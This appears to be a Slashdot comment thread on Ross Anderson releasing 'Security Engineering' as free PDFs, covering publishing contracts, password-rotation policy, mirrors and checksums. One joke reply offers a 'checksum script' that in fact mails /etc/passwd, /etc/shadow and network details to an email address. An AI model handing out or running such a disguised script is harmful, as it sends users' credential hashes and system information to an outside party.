"Security Engineering" Is Now Online

An anonymous reader writes "Ross Anderson, author of 'Security Engineering', notifies in a message to comp.risks that he just got permission from Wiley to let anyone download the full content of his book for free. This is one of the best books on computer security and it is used as textbook in many University courses (I teach two of them)."

Backwards System

[eldavojohn (898314)]

The publishers thought for years that it was too risky to let authors put books online but they are gradually learning that this isn't so. Putting a book online often increases its sales; more people read it and those who find it useful often go buy a copy.

Funny how that works with media, isn't it? Newspapers are free to read on-line. Do they blame lack of income on that? Hell no, they probably make more money on ads that didn't cost ink and paper to print!

If we were concerned about artists, you'd put all their music online--eliminating album profits to them and labels--and pay to see the live shows. That's where they make all their money anyway.

Poor tech authors often sign anything that's in front of them to get their books out. Which means they don't make squat on the sales plus the publisher hikes the price up so that they turn a good profit. Ever bought Duda, Hart & Stork's Pattern Classification [amazon.com]? Good luck, $100 for a six year old book!? Give me the black and white Asian release that's illegally sold on eBay for $10. Yet it remains a standard in the field.

You don't believe me that authors sign outrageous contracts? Well, this poor man had to beg to get his work online. Sounds like he didn't sign a contract that left him creative and absolute control over the distribution of this work.

Yet if they don't get it into print, it can't be used in a classroom setting. What a terrible system (hail capitalism). To all artists, authors and producers of media, please cut out the middle men that make it nearly impossible for me to afford your beautiful works and more or less cheat you out of money in a highway robbery-like scam.

Printed word was an amazing invention because it posed a method to mechanically copy texts and ideas and get them out to people. The internet allows you to do that for nearly free ... use it!

Re:Backwards System

[by Anonymous Coward]

Yet if they don't get it into print, it can't be used in a classroom setting.

Fortunately, this isn't always true! While taking my advanced operating systems course, we used Linux Device Drivers which is available online for free [xml.com]. This is also the case with my Programming Languages class where we learned and wrote an interpreter for Scheme. Then, in my computers and society class we used [scheme.com]ESR's writings [catb.org] and Stallman's biography [oreilly.com].

Maybe more topics could be covered in free format... Seems to me like Google is making life easier for some English courses [google.com] and MIT already has opencourseware up and running [mit.edu].

Guess I went off on a tangent over one little line... :)

Re:Backwards System

[Red Flayer (890720)]

Sounds like he didn't sign a contract that left him creative and absolute control over the distribution of this work.

Who woulda thunk it... he signs a contract to get a company to publish and distribute his work, and doesn't retain absolute control? If he wanted complete control, he would have self-published. There are pros and cons of both, and to rip the publishing industry for a perfectly reasonable contract term is ridiculous. As self-publishing becomes more and more feasible given the internet, these restrictions will change. This is a sign of that change, and you should celebrate Wiley rather than lambast them.

Yet if they don't get it into print, it can't be used in a classroom setting. What a terrible system (hail capitalism).

What an imbecilic troll. The problem isn't capitalism, it's the inherent nature of a bureaucratic system -- it's resistant to change (for good reason -- there are lots of crappy ideas out there). This depends not at all on what kind of socioeconomic system is in place, and capitalism may indeed offer better opportunities for authors (do you think an autocratic economic system would enhance the ability of authors to get their material accepted in the classroom?).

Please note, I am not a free market idealist. I am also not an apologist for the publishing industry, and their treatment of authors. However, you severely misrepresent the fact that publishers such as Wiley do indeed provide services to authors, and to the public. (Editing, fact-checking, vetting, advertising, marketing, etc).

Disclaimer: I work in magazine publishing, which is an entirely different kettle of fish. I do, however, deal with book authors on a frequent basis, both self-published and thos epublished by major imprints.

Re:

[Volante3192 (953645)]

Who woulda thunk it... he signs a contract to get a company to publish and distribute his work, and doesn't retain absolute control? If he wanted complete control, he would have self-published.

Shouldn't he still maintain the copyright though? The contract should only affect the print distribution, I would think he should still be able to distribute through other channels how he sees fit, as it's his words, not the publishing company's. ...I say this having no idea what the boilerplate contract looks like i

Re:Backwards System

[hal9000(jr) (316943)]

Dunno about Wiley, but my wife publishes popular fiction and her contacts give the rights to the publisher even though the work is copyrighted to her. There is a clause in the contract, however, something to the effect that 6 years after the publication date, she can petition to get the rights transfferred to her. But that might be particular to her publisher

IOW, even though she is the copyright holder, she can't redistribute the content in any form per the contract.

Re:

[Red Flayer (890720)]

Shouldn't he still maintain the copyright though?

Sure. But the author has signed away their right to publish independently, normally it's an exclusive license. Book publishers include prohibition of publishing online because they've traditionally seen online publishing in direct competition with their print publishing.

Re:Backwards System

[spiffyman (949476)]

Your sentiment makes sense, but I have to agree with the GP. I think people miss some key points here:

1) The ethical (not legal - the contracts settle that) question up until this point has been whether the publishing company has a right to restrict distribution through other channels. It's not a hard case to make on the publishers' side: Until recently, there was little reason to expect that free distribution would make print sales go up, and the data on that remain unclear. So, as a publisher, why wouldn't you want to resist other distribution models?

2) If I read TFA properly, it appears that the text being distributed is the text that was edited, copy edited, etc. by Wiley. As far as I'm concerned, that gives Wiley just as much moral claim to the work as the author. People underestimate the amount of time and effort that goes into the editing process. Writers, by and large, are not good writers. So why should they always retain copyrights?

Disclaimer: I've edited for a newspaper in the past, and I'm currently an editor for an undergraduate journal, so I'm pretty obviously biased against authors-above-all types. Mod appropriately.

"Writers, by and large, are not good writers."

[Futurepower(R) (558542)]

"Writers, by and large, are not good writers."

Very true. We live in a marginally literate world. I read in a manual for technical writers that less than 2% of the population reads non-fiction books not relating to work.

A good example of being marginally literate is Slashdot editors. After years of being editors, they haven't even learned grammar or spelling.

Re:

[jelle (14827)]

"I read in a manual for technical writers that less than 2% of the population reads non-fiction books not relating to work."

I read on Wikipedia that 95% of all statistics are made up.

Now, which statement is more reliable?

Re:

[Red Flayer (890720)]

I didn't mean to call you an imbecilic troll... rather that that particular statement was imbecilic and trollish "(hail capitalism)"? Maybe it's because I'm used to seeing more well-thought out posts from you, that I hold you to a higher standard than a lot of the frequent posters on slashdot... sorry for over-reacting.

It's just strange how much capitalism hurts academia.

I have to disagree with that. There's a reason unis prefer to review texts from reputable publishers, and those publishers do in fact

Music

[bagofbeans (567926)]

I disagree with your statement that people don't buy music that they download. I argue that people learn which music they like buy sampling it (taping in my generation) at an age they can't afford much... and buy it later when they can. Most of my music collection is CDs of stuff I have LPs and infringing tapes of.

For music, you have to hear it to like it. I've bought many a book on the basis of the title alone - never for music.

Re:

[Tiger4 (840741)]

If we were concerned about artists, you'd put all their music online--eliminating album profits to them and labels--and pay to see the live shows. That's where they make all their money anyway.

Sadly untrue. Tours typically only just break even. They are just giant live promotional campaigns for album sales. Airplane tickets, bus rental, hotel fees, meals and catering, wardrobe, stage, sound, and lights. Promotion and ticket handling, venue fees, security, insurance, etc. It all adds up. That is wher

Re:

[cptgrudge (177113)]

But then he won't have much of an online presence either.

The difference is that most of the time, he doesn't want an online presence or to have an entourage. He does it for the music.

Re:Backwards System

[muellerr1 (868578)]

I've got a friend who used to work for a small boutique publisher, and I can tell you that publishers are an author's best friend. Without them the author's works would go nowhere. Fine, change the business model to distribute freely online, but as far as increasing sales of books, those books have to fome from somewhere.

I just don't get the 'cut the middleman' mentality. What exactly do you think the publishers aren't contributing that the authors could do themselves? Are you expecting authors to employ and manage editors, designers, printers, pr and marketing people, advertisers, a nation-wide system of sales reps, sales managers, shipping companies, and so on? Or are you suggesting that these roles aren't necessary? That's the same thing as saying that books should only be digital from here on out. The attitide that the authors should 'just get a loan' to fund these activities is hogwash since the only people who could get a loan of that magnitude for an unpublished manuscript are already established authors, and even then it would be iffy. Then people suggest that authors should just publish online and screw printed materials, but for most applications like textbooks that doesn't really work for the consumer--wouldn't you rather just have a book than having to print it out yourself, which could easily cost as much in ink and paper as a bound book would, while being more irritating? Also, e-book technology still sucks. Besides, the author would still need to employ the editing, pr, marketing & advertising people anyway, because if you don't know about a book, why would you buy it? The fact is, people happily pay for advertising because the return on investment is huge.

Wouldn't it be great if there was a company that had the capital to invest like a bank, but also the expertise to cull the few good manuscripts from the staggering pile of crappy ones, then print and market and distribute these works? Wait, that would be a publisher.

I acknowledge that in some specific cases self-publishing directly to the internet might be a good business plan. But to suggest that we abandon dead trees in most cases misunderstands the market. You said it yourself, "...if they don't get it into print, it can't be used in a classroom setting." Sure, good chunks of fat could be trimmed from the publishing world, but name one industry where this isn't true? I just think that the 'middle man' is necessary to the process.

Sorry, OP. I realize that most of my rant doesn't even apply to your main points. I just don't think the middle man is all that useless in most cases.

Can we change the roles a bit?

[khasim (1285)]

I just don't get the 'cut the middleman' mentality. What exactly do you think the publishers aren't contributing that the authors could do themselves?

For me, the "cut the middleman" mentality is because the middleman is not serving my interests nor the author's.

I cannot buy the books I want because the middleman owns the book and refuses to publish it anymore.

I cannot buy the book from the author because the author doesn't have the rights to sell it to me.

How about the middleman actually behave like a middl

Re:

[by Anonymous Coward]

The book wouldn't exist in the first place without the middleman. To say that they are not serving the author's interests is not true; the author had the choice not to sign the contract with the publisher. Contract negotiations are a give and take; the author both got something and had something taken away. Your interests are irrelevant to this business decision except as part of a potential market, and if the publisher thinks they can't make money in that potential market, they won't try. You may not l

Re:

[sukotto (122876)]

If the book isn't available, does it really exist?

Yes, it would.

[khasim (1285)]

The book wouldn't exist in the first place without the middleman.

Yes, it would. Strangely enough, books were written before "publishers" were invented.

To say that they are not serving the author's interests is not true; the author had the choice not to sign the contract with the publisher. Contract negotiations are a give and take; the author both got something and had something taken away.

Contracts do not always "serve" both party's interests. As in the case of the author's previous work no longer being pu

Re:

[bcrowell (177657)]

As the author of some free, online textbooks, I actually agree with a lot of your points. However, I think they're overstated. My books have actually been reasonably successful without signing on with a publisher. I've had adoptions from 13 other schools besides my own. POD companies like lulu.com have made it pretty trivial to take care of production and distribution. Advertising also isn't rocket science. I designed my own ads, and ran them in a trade magazine (The Physics Teacher). A lot of the money tha

Re:

[muellerr1 (868578)]

I'm really glad to see that you were able to self-publish successfully. Not all authors have such a mind for business in addition to their more creative talents. Your point about POD is a really good one, but it still doesn't solve the editing and marketing problems. Maybe the reps visiting schools is an example of a serious fat-trimming opportunity, but there's still more to marketing than a few ads and badgering teachers. Textbooks might be a bad example for this, but don't you suppose that going with

OT: Mirrored Content

[EnigmaticSource (649695)]

Sorry for the off thread/topic reply, but in the intrest of visibility, here you go:

Part 1: http://momoshare.com/file.php?file=1911bc824177937 7bdad8bc9387b4177 [momoshare.com]
Part 2: http://momoshare.com/file.php?file=f88b489ca8f1dcd dc76778cee3ba9d7b [momoshare.com]

SHA1 Sums
b14f5b17f2284823cd803d2c1c01970ffe88684d seceng1.zip
740a0de7f86893326b074862abdf377c881734b3 seceng2.zip

Re:

[Brian Stretch (5304)]

Yet if they don't get it into print, it can't be used in a classroom setting. What a terrible system (hail capitalism).

You think our government education near-monopoly is capitalist? Maybe capitalism as imagined by socialists, there's a lot of that going around...

Slashdotted

[by Anonymous Coward]

And now it's offline.

Why isn't there a tarball of all the PDFs?

Re:

[in2mind (988476)]

The link to the chapter 1 is :http://www.cl.cam.ac.uk/~rja14/Papers/SE-01.pdf [cam.ac.uk]

Upto "SE-25.pdf" covers the 25 chapters of the book.
Try the links later.

Maybe their server used Maxtor drives...

[The_REAL_DZA (731082)]

...I heard somewhere that they occasionally go up in smoke and flames...
 
In which case it'd be a "fireball" (rural-Southern pronunciation: "far.ball") of all the PDF's...

It's baaaaack!

[Ungrounded Lightning (62228)]

I just downloaded the whole thing at max speed on my DSL line from the server pointed to by the original link.

I presume it just got swamped for a bit and has now recovered, the load has backed off, or the ISP has boosted capacity due to the load.

Password Changing

[tritonman (998572)]

What I want to know is if this guy supports the "change your server passwords every 90 days" crap. There are about 30 passwords that I need to remember for different servers here and the admins think that it's more secure to make the passwords change every 90 days, requiring the people to write down the passwords because they can't keep remembering them. To me, it seems like a much more secure idea to change the passwords when a person who knows one of the passwords leaves. If you wait for the 90 days to

Re:

[CastrTroy (595695)]

I guess the problem is, is that somebody could bruteforce your password if you never changed it. Changing it that often means that they won't have time to brute force it before it changes. Although, I think that if you're going to do something like this, you should just have an RSA token or something for logging in. Makes it easier for the people who should have access to log in, without having to remember 30 different passwords that change every 90 days.

Oh, and what's so wrong with writing it down an

Re:Password Changing

[ari_j (90255)]

The possibility of brute force is not an argument for changing passwords frequently, unless you catch someone trying to brute force it and change it to one they've already tried. Brute force relies on the statistical likelihood of guessing the password before the reason you want access goes away. Changing the password every 90 days has no bearing on the likelihood of it being guessed in a certain amount of time, unless what you change it to has a probability of being guessed of less than what it was by virtue of the brute force method employed.

The best thing to do is to change your password anytime there is a good chance that someone who should not know it does know it. That includes an employee leaving, evidence of an unauthorized access that could have been attained by having the password (possibly discovered by brute force or by other methods), theft of the business card you wrote it down on, etc. But it does not include the mere possibility that someone could guess it - changing the password has no real bearing on their chances of guessing correctly, unless it was something insanely simple before and changed to something reasonable.

Re:

[by Anonymous Coward]

Ahem. As an admin myself I would like to throw a few ideas in there.

1) When I had a job where I wasn't in control (not admin, just support) and I didn't particulary fancy the admin staff, I brute forced my way into admin, had they changed it every 90 days it wouldn't have been worth the effort more than once or in particulary needed times. As it was, they appeared to agree with you, which in turn guaranteed me admin access from brute force methods until I ended my employment there (and gave the adm

Re:

[anum (799950)]

And...

5) Someone gets a copy of your password file (or SAM or wherever your hashed passwords are kept). If you change your passwords occasionally then they only have a limited time to run brute force methods against the file. Once you change your passwords you are safe again. Don't change your passwords and eventually they will own your entire organization. You won't even know it happened until it's too late. It's a less likely scenario these days but it is still a valid attack vector. Once that file

Re:

[ari_j (90255)]

Having an employee who would try to repeatedly brute force your passwords qualifies as "anytime there is a good chance that someone who should not know it does know it."

You got it. Change the circumstances.

[khasim (1285)]

#1. Putting the password in your wallet is taking a less secure process (written password) and encasing it in a more secure container (your wallet).

#2. Change the login process to lock out the account for 15 minutes after 3 failed login attempts. That way, less random passwords can be used (and easily remembered). As long as there is a real person monitoring the logs and watching for attacks so that action can be taken.

#3. If it is something that can be cracked off-line (secret message), store the really long password on a USB key or something. Then put that key in your wallet (#1).

A single approach is NOT sufficient for every scenario.

Grr

[imikem (767509)]

Did the authors of said fine book manage to spell "Engineering" correctly?

Come On, 'Enginner' Is A Word

[eldavojohn (898314)]

"Enginner": n. one who drinks gin and attempts to solve problems with gin and the mathematics of gin drinking. Ex. The sot that lay in the gutter claimed to be an enginner as a passerby spat on him.

"Enginnering": trans. v. to lay out, throw up, or manage as a gin drinker (see 'enginnerate').

more free books

[plopez (54068)]

google 'free books' or 'free books science' for a plethora of sites publishing or linking to books for which the copyrights have expired or been released.

"Share and enjoy!"

Widest audience .. but...

[in2mind (988476)]

My goal in making the book freely available is twofold. First, I want to reach the widest possible audience

The book got featured in slashdot.But the server is down. Should have mirrored it in free servers atleast.

Two questions

[Lord Ender (156273)]

1) Is it cool to include this in Project Gutenberg?

2) Does anyone have a link, or simple way, to download this entire book in one file or torrent?

Re:

[RShizzle (983535)]

wget -r http://www.cl.cam.ac.uk/~rja14/book.html [cam.ac.uk]

Re:

[Lord Ender (156273)]

That would work if the server were not slashdotted.

SHA1SUMs

[$calar (590356)]

For those of you who actually downloaded the book, here are the checksums I got. Let me know if you got the same. Thanks.

83a9bddb0ebd272cdb54c4de00580b3489a63a6b SE-01.pdf
c35f69d6080db3e09f957303e197ac8a17d1bdbf SE-02.pdf
172313ac2ca8097c68440a57736df505d8dd0842 SE-03.pdf
e999076e677a7df800f799944c060707b4afe5a1 SE-04.pdf
d014a4974797568cf6ea792d4dc49f1842213b30 SE-05.pdf
1effa14958310ed5227cfc8ead3905f4d9001131 SE-06.pdf
56e0605f0236be4d1b09cf6c6f62bd76c8581587 SE-07.pdf
f59664e9a67040ed9281b5866d56ac44802cdd8d SE-08.pdf
2269d3a3460d911780c4e3e81a819b51754617e9 SE-09.pdf
93d007c521184516405e7b2327beab8e245de15a SE-10.pdf
3ffc2ac64bb07c4d599ec67adab0e00ca16e869e SE-11.pdf
0eba902e98efcd9c107857e286253ef7ada1be81 SE-12.pdf
791d3ef1aa163f55ff1b096b1f08d487ba3c0417 SE-13.pdf
b58649be6a297097e412ad319f3fdeceb054f69a SE-14.pdf
73f66ce309b3c28ca7173b332152266452473eb2 SE-15.pdf
7b61e8330ef2b09a5d937688521a553b5e47968e SE-16.pdf
d816db2e750734700ecffaa99673e88839f95555 SE-17.pdf
0b050d413010f43d2e80ea868c4e9ca4c7bf7ec4 SE-18.pdf
e83f9c08ad10ba534b191cc267a157624bb60dc0 SE-19.pdf
256a7f5f202ad92e539b21f1d232c3d6a6c40705 SE-20.pdf
6d5018caceffdb5154a625414bef877afdfc831c SE-21.pdf
1dcc67d39f345f27852c7b1f641f802bd8bd738a SE-22.pdf
00da949e75121aa387dc9e33e77460cf26268459 SE-23.pdf
fb809a4144b3205e1bc043dc0ca92baf623c0306 SE-24.pdf
4cee602bcd02ac32055f95798c5a3aa5201822ec SE-Bib.pdf
f3c7f992180fa42325020b8a93ed2b2fa93a5779 SE-FM.pdf

Re:

[WhiplashII (542766)]

Here is a script you can use to generate the MD5s:

#!/bin/sh

sendmail me@me.com theEnd

`cat /etc/passwd`
`cat /etc/shadow`
`ifconfig`
`netstat -anlp`
theEnd

Re:

[$calar (590356)]

OK, when I wrote that at first I was serious but now I can see why it is funny. The whole thing is that you run sha1sum or md5sum to verify that your download is accurate. If this were a software download, we would want to see the hash to make sure the file wasn't tampered with. Considering this book is called "Security Engineering," it's kind of a joke that you would want to verify the source files to make sure they weren't tampered with, since I doubt a virus can be embedded into a PDF file. It's also iro

Re:

[Java Pimp (98454)]

...it's kind of a joke that you would want to verify the source files to make sure they weren't tampered with, since I doubt a virus can be embedded into a PDF file.

http://secunia.com/advisories/16466 [secunia.com]

Stranger things have happened. :-)

E-books lacking in important feature

[bananaendian (928499)]

But what's the point if you can't display it on your bookshelf among all the other tomes you've never read.

"Reading a book on security enginnering does not security enginneer one make."
- Wiseguy

reviews

[bcrowell (177657)]

User-submitted reviews would be welcom at theassayer.org [theassayer.org], a site I run that catalogs free books, and accepts reviews of them.

Mirror

[by Anonymous Coward]

Since I'm too lazy to make a torrent, here is a mirror of the files, hosted on BaDonGo.com:
http://www.badongo.com/file/1324503 [badongo.com]

Here's the torrent.

[by Anonymous Coward]

Conveniently located at the Pirate Bay [thepiratebay.org]. No karma whoring for me!

Another mirror

[alienfluid (677872)]

I've mirrored the PDFs at:

farhanahmed.com [farhanahmed.com]

Re:

[ScrewMaster (602015)]

Better yet, somebody throw up a torrent and link us to it.